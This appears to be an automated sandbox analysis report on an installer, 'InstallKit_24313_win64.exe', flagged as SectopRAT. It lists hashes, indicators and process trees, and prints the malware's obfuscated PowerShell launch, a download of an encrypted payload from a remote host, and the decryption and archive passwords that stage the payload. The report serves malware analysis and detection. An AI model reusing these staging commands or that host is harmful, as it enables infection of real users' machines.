Analysis
-
max time kernel
147s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
13-07-2024 15:03
Static task
static1
Behavioral task
behavioral1
Sample
InstallKit_24313_win64.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
InstallKit_24313_win64.exe
Resource
win10v2004-20240709-en
General
-
Target
InstallKit_24313_win64.exe
-
Size
21.4MB
-
MD5
65a1f593552de7934b0bcb782abc43c4
-
SHA1
b379c45dcfd03680bb1d97e34a27d1eec8b398a4
-
SHA256
b0410c03a893377b1726c7d31fed5796ae24c8ba55061aa7a02f04fd96a32af5
-
SHA512
0ebceed4be166581b00d7aa73e439ccee8bd2170d1073fe2b269aa0d1a3c04dd26fb4add4b4aa77a8b69a9adff06365310306172e1003303fbe90b2aad3077bc
-
SSDEEP
196608:6Y/W2TrybPU3ENBlut4E/iUous5kW+bD5Pc90umN40vyv+SQBVluw9a+Y:6aWqrybhNBlu3/i5X5kpD5GmHv1nRY
Malware Config
Signatures
-
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2740-475-0x0000000000400000-0x00000000004C6000-memory.dmp family_sectoprat -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\is-PNP9U.tmp upx behavioral1/memory/2592-147-0x0000000000400000-0x00000000004F4000-memory.dmp upx behavioral1/memory/2592-151-0x0000000000400000-0x00000000004F4000-memory.dmp upx behavioral1/memory/2776-173-0x0000000000400000-0x00000000004F4000-memory.dmp upx behavioral1/memory/1612-344-0x0000000000400000-0x00000000004F4000-memory.dmp upx behavioral1/memory/680-352-0x0000000003AD0000-0x0000000003BC4000-memory.dmp upx behavioral1/memory/2212-356-0x0000000000400000-0x00000000004F4000-memory.dmp upx behavioral1/memory/1912-423-0x0000000003B00000-0x0000000003BF4000-memory.dmp upx behavioral1/memory/1788-427-0x0000000000400000-0x00000000004F4000-memory.dmp upx behavioral1/memory/1912-436-0x0000000003B00000-0x0000000003BF4000-memory.dmp upx behavioral1/memory/2588-440-0x0000000000400000-0x00000000004F4000-memory.dmp upx -
An obfuscated cmd.exe command-line is typically used to evade detection. 3 IoCs
Processes:
cmd.execmd.execmd.exepid process 2564 cmd.exe 1596 cmd.exe 2996 cmd.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
IDRBackup.execmd.exeIDRBackup.exeIDRBackup.execmd.execmd.exedescription pid process target process PID 2384 set thread context of 1976 2384 IDRBackup.exe cmd.exe PID 1976 set thread context of 2740 1976 cmd.exe MSBuild.exe PID 2900 set thread context of 708 2900 IDRBackup.exe cmd.exe PID 2992 set thread context of 1376 2992 IDRBackup.exe cmd.exe PID 708 set thread context of 892 708 cmd.exe MSBuild.exe PID 1376 set thread context of 2748 1376 cmd.exe MSBuild.exe -
Executes dropped EXE 24 IoCs
Processes:
InstallKit_24313_win64.tmpInstallKit_24313_win64.tmpInstallKit_24313_win64.tmpInstallKit_24313_win64.tmpInstallKit_24313_win64.tmpInstallKit_24313_win64.tmpAAD.BrokerPlugin.exeDuetLaunch.exeAAD.BrokerPlugin.exeDuetUpdater.exeIDRBackup.exeIDRBackup.exeAAD.BrokerPlugin.exeDuetLaunch.exeAAD.BrokerPlugin.exeDuetUpdater.exeIDRBackup.exeIDRBackup.exeAAD.BrokerPlugin.exeDuetLaunch.exeAAD.BrokerPlugin.exeDuetUpdater.exeIDRBackup.exeIDRBackup.exepid process 2692 InstallKit_24313_win64.tmp 2984 InstallKit_24313_win64.tmp 2508 InstallKit_24313_win64.tmp 680 InstallKit_24313_win64.tmp 1044 InstallKit_24313_win64.tmp 1912 InstallKit_24313_win64.tmp 2592 AAD.BrokerPlugin.exe 1568 DuetLaunch.exe 2776 AAD.BrokerPlugin.exe 1288 DuetUpdater.exe 236 IDRBackup.exe 2384 IDRBackup.exe 1612 AAD.BrokerPlugin.exe 2624 DuetLaunch.exe 2212 AAD.BrokerPlugin.exe 1940 DuetUpdater.exe 2608 IDRBackup.exe 2900 IDRBackup.exe 1788 AAD.BrokerPlugin.exe 1128 DuetLaunch.exe 2588 AAD.BrokerPlugin.exe 624 DuetUpdater.exe 1616 IDRBackup.exe 2992 IDRBackup.exe -
Loads dropped DLL 64 IoCs
Processes:
InstallKit_24313_win64.exeInstallKit_24313_win64.tmpInstallKit_24313_win64.exeInstallKit_24313_win64.tmpInstallKit_24313_win64.exeInstallKit_24313_win64.tmpInstallKit_24313_win64.exeInstallKit_24313_win64.tmpInstallKit_24313_win64.exeInstallKit_24313_win64.tmpInstallKit_24313_win64.exeInstallKit_24313_win64.tmpIDRBackup.exeIDRBackup.execmd.exeIDRBackup.exeIDRBackup.exepid process 2348 InstallKit_24313_win64.exe 2692 InstallKit_24313_win64.tmp 2708 InstallKit_24313_win64.exe 2984 InstallKit_24313_win64.tmp 1724 InstallKit_24313_win64.exe 2508 InstallKit_24313_win64.tmp 2332 InstallKit_24313_win64.exe 680 InstallKit_24313_win64.tmp 1948 InstallKit_24313_win64.exe 1044 InstallKit_24313_win64.tmp 2484 InstallKit_24313_win64.exe 1912 InstallKit_24313_win64.tmp 2984 InstallKit_24313_win64.tmp 2984 InstallKit_24313_win64.tmp 2984 InstallKit_24313_win64.tmp 2984 InstallKit_24313_win64.tmp 2984 InstallKit_24313_win64.tmp 2984 InstallKit_24313_win64.tmp 2984 InstallKit_24313_win64.tmp 236 IDRBackup.exe 236 IDRBackup.exe 236 IDRBackup.exe 236 IDRBackup.exe 236 IDRBackup.exe 236 IDRBackup.exe 236 IDRBackup.exe 236 IDRBackup.exe 236 IDRBackup.exe 2384 IDRBackup.exe 2384 IDRBackup.exe 2384 IDRBackup.exe 2384 IDRBackup.exe 2384 IDRBackup.exe 2384 IDRBackup.exe 2384 IDRBackup.exe 2384 IDRBackup.exe 1976 cmd.exe 680 InstallKit_24313_win64.tmp 680 InstallKit_24313_win64.tmp 680 InstallKit_24313_win64.tmp 680 InstallKit_24313_win64.tmp 680 InstallKit_24313_win64.tmp 680 InstallKit_24313_win64.tmp 2608 IDRBackup.exe 2608 IDRBackup.exe 2608 IDRBackup.exe 2608 IDRBackup.exe 2608 IDRBackup.exe 2608 IDRBackup.exe 2608 IDRBackup.exe 2608 IDRBackup.exe 2900 IDRBackup.exe 2900 IDRBackup.exe 2900 IDRBackup.exe 2900 IDRBackup.exe 2900 IDRBackup.exe 2900 IDRBackup.exe 2900 IDRBackup.exe 2900 IDRBackup.exe 1912 InstallKit_24313_win64.tmp 1912 InstallKit_24313_win64.tmp 1912 InstallKit_24313_win64.tmp 1912 InstallKit_24313_win64.tmp 1912 InstallKit_24313_win64.tmp -
Processes:
powershell.exepowershell.exepowershell.exepid process 2624 powershell.exe 2304 powershell.exe 2912 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
InstallKit_24313_win64.tmppowershell.exeInstallKit_24313_win64.tmppowershell.exeInstallKit_24313_win64.tmppowershell.exeIDRBackup.exeIDRBackup.execmd.exeIDRBackup.exeIDRBackup.exeIDRBackup.exeIDRBackup.execmd.exeMSBuild.execmd.exepid process 2984 InstallKit_24313_win64.tmp 2984 InstallKit_24313_win64.tmp 2624 powershell.exe 680 InstallKit_24313_win64.tmp 680 InstallKit_24313_win64.tmp 2304 powershell.exe 1912 InstallKit_24313_win64.tmp 1912 InstallKit_24313_win64.tmp 2912 powershell.exe 236 IDRBackup.exe 2384 IDRBackup.exe 2384 IDRBackup.exe 1976 cmd.exe 1976 cmd.exe 2608 IDRBackup.exe 2900 IDRBackup.exe 2900 IDRBackup.exe 1616 IDRBackup.exe 2992 IDRBackup.exe 2992 IDRBackup.exe 708 cmd.exe 708 cmd.exe 2740 MSBuild.exe 2740 MSBuild.exe 1376 cmd.exe 1376 cmd.exe -
Suspicious behavior: MapViewOfSection 9 IoCs
Processes:
IDRBackup.execmd.exeIDRBackup.exeIDRBackup.execmd.execmd.exepid process 2384 IDRBackup.exe 1976 cmd.exe 1976 cmd.exe 2900 IDRBackup.exe 2992 IDRBackup.exe 708 cmd.exe 708 cmd.exe 1376 cmd.exe 1376 cmd.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exeMSBuild.exedescription pid process Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 2912 powershell.exe Token: SeDebugPrivilege 2740 MSBuild.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
InstallKit_24313_win64.tmpInstallKit_24313_win64.tmpInstallKit_24313_win64.tmppid process 2984 InstallKit_24313_win64.tmp 680 InstallKit_24313_win64.tmp 1912 InstallKit_24313_win64.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
MSBuild.exepid process 2740 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
InstallKit_24313_win64.exeInstallKit_24313_win64.tmpInstallKit_24313_win64.exeInstallKit_24313_win64.tmpcmd.exeInstallKit_24313_win64.exeInstallKit_24313_win64.tmpInstallKit_24313_win64.exeInstallKit_24313_win64.tmpcmd.exeInstallKit_24313_win64.exeInstallKit_24313_win64.tmpdescription pid process target process PID 2348 wrote to memory of 2692 2348 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2348 wrote to memory of 2692 2348 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2348 wrote to memory of 2692 2348 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2348 wrote to memory of 2692 2348 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2348 wrote to memory of 2692 2348 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2348 wrote to memory of 2692 2348 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2348 wrote to memory of 2692 2348 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2692 wrote to memory of 2708 2692 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2692 wrote to memory of 2708 2692 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2692 wrote to memory of 2708 2692 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2692 wrote to memory of 2708 2692 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2692 wrote to memory of 2708 2692 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2692 wrote to memory of 2708 2692 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2692 wrote to memory of 2708 2692 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2708 wrote to memory of 2984 2708 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2708 wrote to memory of 2984 2708 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2708 wrote to memory of 2984 2708 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2708 wrote to memory of 2984 2708 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2708 wrote to memory of 2984 2708 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2708 wrote to memory of 2984 2708 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2708 wrote to memory of 2984 2708 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2984 wrote to memory of 2564 2984 InstallKit_24313_win64.tmp cmd.exe PID 2984 wrote to memory of 2564 2984 InstallKit_24313_win64.tmp cmd.exe PID 2984 wrote to memory of 2564 2984 InstallKit_24313_win64.tmp cmd.exe PID 2984 wrote to memory of 2564 2984 InstallKit_24313_win64.tmp cmd.exe PID 2564 wrote to memory of 2624 2564 cmd.exe powershell.exe PID 2564 wrote to memory of 2624 2564 cmd.exe powershell.exe PID 2564 wrote to memory of 2624 2564 cmd.exe powershell.exe PID 1724 wrote to memory of 2508 1724 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1724 wrote to memory of 2508 1724 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1724 wrote to memory of 2508 1724 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1724 wrote to memory of 2508 1724 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1724 wrote to memory of 2508 1724 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1724 wrote to memory of 2508 1724 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1724 wrote to memory of 2508 1724 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2508 wrote to memory of 2332 2508 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2508 wrote to memory of 2332 2508 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2508 wrote to memory of 2332 2508 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2508 wrote to memory of 2332 2508 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2508 wrote to memory of 2332 2508 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2508 wrote to memory of 2332 2508 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2508 wrote to memory of 2332 2508 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe PID 2332 wrote to memory of 680 2332 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2332 wrote to memory of 680 2332 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2332 wrote to memory of 680 2332 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2332 wrote to memory of 680 2332 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2332 wrote to memory of 680 2332 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2332 wrote to memory of 680 2332 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 2332 wrote to memory of 680 2332 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 680 wrote to memory of 1596 680 InstallKit_24313_win64.tmp cmd.exe PID 680 wrote to memory of 1596 680 InstallKit_24313_win64.tmp cmd.exe PID 680 wrote to memory of 1596 680 InstallKit_24313_win64.tmp cmd.exe PID 680 wrote to memory of 1596 680 InstallKit_24313_win64.tmp cmd.exe PID 1596 wrote to memory of 2304 1596 cmd.exe powershell.exe PID 1596 wrote to memory of 2304 1596 cmd.exe powershell.exe PID 1596 wrote to memory of 2304 1596 cmd.exe powershell.exe PID 1948 wrote to memory of 1044 1948 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1948 wrote to memory of 1044 1948 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1948 wrote to memory of 1044 1948 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1948 wrote to memory of 1044 1948 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1948 wrote to memory of 1044 1948 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1948 wrote to memory of 1044 1948 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1948 wrote to memory of 1044 1948 InstallKit_24313_win64.exe InstallKit_24313_win64.tmp PID 1044 wrote to memory of 2484 1044 InstallKit_24313_win64.tmp InstallKit_24313_win64.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\is-D00UU.tmp\InstallKit_24313_win64.tmp"C:\Users\Admin\AppData\Local\Temp\is-D00UU.tmp\InstallKit_24313_win64.tmp" /SL5="$40150,4828351,725504,C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe" /VERYSILENT3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Users\Admin\AppData\Local\Temp\is-LJPHI.tmp\InstallKit_24313_win64.tmp"C:\Users\Admin\AppData\Local\Temp\is-LJPHI.tmp\InstallKit_24313_win64.tmp" /SL5="$50150,4828351,725504,C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\system32\cmd.exe"cmd.exe" /C p^o^w^e^r^s^h^e^l^l^.^e^x^e^ -^N^o^L^o^g^o^ -^N^o^P^r^o^f^i^l^e^ -^E^x^e^c^u^t^i^o^n^P^o^l^i^c^y^ ^R^e^m^o^t^e^S^i^g^n^e^d^ -^F^i^l^e^ "C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\\D59C3EEV.ps1"5⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\\D59C3EEV.ps1"6⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\AAD.BrokerPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\\AAD.BrokerPlugin.exe" --decrypt --batch --yes --passphrase "putin" -o "C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\\config.ini" "C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\\config.enc"5⤵
- Executes dropped EXE
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\DuetLaunch.exe"C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\\DuetLaunch.exe" -k --silent --fail --ssl-reqd --location --output "C:\Users\Admin\AppData\Local\plenished\\plenished.gpg" "https://intaingulyndora.ink/darwin/api/hataza.rar.gpg"5⤵
- Executes dropped EXE
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\AAD.BrokerPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\\AAD.BrokerPlugin.exe" --decrypt --batch --yes --passphrase "Embark$Unshaken$Occupancy5$Stride$Stainable" -o "C:\Users\Admin\AppData\Local\plenished\\plenished.rar" "C:\Users\Admin\AppData\Local\plenished\\plenished.gpg"5⤵
- Executes dropped EXE
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\DuetUpdater.exe"C:\Users\Admin\AppData\Local\Temp\is-HFPMM.tmp\\DuetUpdater.exe" x -pAJGCrB&6s!FMASMm#Ud4 -o+ "C:\Users\Admin\AppData\Local\plenished\\plenished.rar" "C:\Users\Admin\AppData\Local\plenished\"5⤵
- Executes dropped EXE
PID:1288 -
C:\Users\Admin\AppData\Local\plenished\IDRBackup.exe"C:\Users\Admin\AppData\Local\plenished\IDRBackup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:236 -
C:\Users\Admin\AppData\Roaming\streamconfig_v3\IDRBackup.exeC:\Users\Admin\AppData\Roaming\streamconfig_v3\IDRBackup.exe6⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2384 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- Suspicious use of SetThreadContext
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1976 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2740
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:308
-
C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\is-F9F51.tmp\InstallKit_24313_win64.tmp"C:\Users\Admin\AppData\Local\Temp\is-F9F51.tmp\InstallKit_24313_win64.tmp" /SL5="$A01FC,4828351,725504,C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe" /VERYSILENT3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\is-07JEI.tmp\InstallKit_24313_win64.tmp"C:\Users\Admin\AppData\Local\Temp\is-07JEI.tmp\InstallKit_24313_win64.tmp" /SL5="$B01FC,4828351,725504,C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\system32\cmd.exe"cmd.exe" /C p^o^w^e^r^s^h^e^l^l^.^e^x^e^ -^N^o^L^o^g^o^ -^N^o^P^r^o^f^i^l^e^ -^E^x^e^c^u^t^i^o^n^P^o^l^i^c^y^ ^R^e^m^o^t^e^S^i^g^n^e^d^ -^F^i^l^e^ "C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\\D59C3EEV.ps1"5⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\\D59C3EEV.ps1"6⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304 -
C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\AAD.BrokerPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\\AAD.BrokerPlugin.exe" --decrypt --batch --yes --passphrase "putin" -o "C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\\config.ini" "C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\\config.enc"5⤵
- Executes dropped EXE
PID:1612 -
C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\DuetLaunch.exe"C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\\DuetLaunch.exe" -k --silent --fail --ssl-reqd --location --output "C:\Users\Admin\AppData\Local\plenished\\plenished.gpg" "https://intaingulyndora.ink/darwin/api/hataza.rar.gpg"5⤵
- Executes dropped EXE
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\AAD.BrokerPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\\AAD.BrokerPlugin.exe" --decrypt --batch --yes --passphrase "Embark$Unshaken$Occupancy5$Stride$Stainable" -o "C:\Users\Admin\AppData\Local\plenished\\plenished.rar" "C:\Users\Admin\AppData\Local\plenished\\plenished.gpg"5⤵
- Executes dropped EXE
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\DuetUpdater.exe"C:\Users\Admin\AppData\Local\Temp\is-4GISI.tmp\\DuetUpdater.exe" x -pAJGCrB&6s!FMASMm#Ud4 -o+ "C:\Users\Admin\AppData\Local\plenished\\plenished.rar" "C:\Users\Admin\AppData\Local\plenished\"5⤵
- Executes dropped EXE
PID:1940 -
C:\Users\Admin\AppData\Local\plenished\IDRBackup.exe"C:\Users\Admin\AppData\Local\plenished\IDRBackup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2608 -
C:\Users\Admin\AppData\Roaming\streamconfig_v3\IDRBackup.exeC:\Users\Admin\AppData\Roaming\streamconfig_v3\IDRBackup.exe6⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2900 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:708 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵PID:892
-
C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Users\Admin\AppData\Local\Temp\is-R1S99.tmp\InstallKit_24313_win64.tmp"C:\Users\Admin\AppData\Local\Temp\is-R1S99.tmp\InstallKit_24313_win64.tmp" /SL5="$20270,4828351,725504,C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe"C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe" /VERYSILENT3⤵
- Loads dropped DLL
PID:2484 -
C:\Users\Admin\AppData\Local\Temp\is-EK16T.tmp\InstallKit_24313_win64.tmp"C:\Users\Admin\AppData\Local\Temp\is-EK16T.tmp\InstallKit_24313_win64.tmp" /SL5="$30270,4828351,725504,C:\Users\Admin\AppData\Local\Temp\InstallKit_24313_win64.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1912 -
C:\Windows\system32\cmd.exe"cmd.exe" /C p^o^w^e^r^s^h^e^l^l^.^e^x^e^ -^N^o^L^o^g^o^ -^N^o^P^r^o^f^i^l^e^ -^E^x^e^c^u^t^i^o^n^P^o^l^i^c^y^ ^R^e^m^o^t^e^S^i^g^n^e^d^ -^F^i^l^e^ "C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\\D59C3EEV.ps1"5⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:2996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\\D59C3EEV.ps1"6⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\AAD.BrokerPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\\AAD.BrokerPlugin.exe" --decrypt --batch --yes --passphrase "putin" -o "C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\\config.ini" "C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\\config.enc"5⤵
- Executes dropped EXE
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\DuetLaunch.exe"C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\\DuetLaunch.exe" -k --silent --fail --ssl-reqd --location --output "C:\Users\Admin\AppData\Local\plenished\\plenished.gpg" "https://intaingulyndora.ink/darwin/api/hataza.rar.gpg"5⤵
- Executes dropped EXE
PID:1128 -
C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\AAD.BrokerPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\\AAD.BrokerPlugin.exe" --decrypt --batch --yes --passphrase "Embark$Unshaken$Occupancy5$Stride$Stainable" -o "C:\Users\Admin\AppData\Local\plenished\\plenished.rar" "C:\Users\Admin\AppData\Local\plenished\\plenished.gpg"5⤵
- Executes dropped EXE
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\DuetUpdater.exe"C:\Users\Admin\AppData\Local\Temp\is-GBT0E.tmp\\DuetUpdater.exe" x -pAJGCrB&6s!FMASMm#Ud4 -o+ "C:\Users\Admin\AppData\Local\plenished\\plenished.rar" "C:\Users\Admin\AppData\Local\plenished\"5⤵
- Executes dropped EXE
PID:624 -
